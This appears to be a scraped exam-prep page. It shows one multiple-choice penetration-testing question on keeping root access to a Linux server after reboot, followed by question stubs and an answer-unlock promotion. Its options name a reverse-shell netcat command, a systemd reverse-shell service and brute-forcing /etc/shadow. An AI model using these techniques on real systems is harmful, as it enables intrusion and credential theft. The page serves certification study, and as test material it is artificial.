A penetration tester has obtained root access to a Linux-based file server and would like to maintain persistence after reboot. Which of the following techniques would BEST support this objective?
A) Create a one-shot systemd service to establish a reverse shell.
B) Obtain /etc/shadow and brute force the root password. Obtain /etc/shadow and brute force the root password.
C) Run the nc -e /bin/sh <...> command. Run the nc -e /bin/sh <...> command.
D) Move laterally to create a user account on LDAP
Correct Answer:
Verified
Q31: A penetration tester who is conducting a
Q32: A penetration tester has completed an analysis
Q33: A red-team tester has been contracted to
Q34: A penetration tester wants to scan a
Q35: A penetration tester runs the following command
Q37: A penetration tester logs in as a
Q38: A software development team is concerned that
Q39: A penetration tester has identified several newly
Q40: A penetration tester needs to perform a
Q41: A penetration tester was able to gain
Unlock this Answer For Free Now!
View this answer and more for free by performing one of the following actions
Scan the QR code to install the App and get 2 free unlocks
Unlock quizzes for free by uploading documents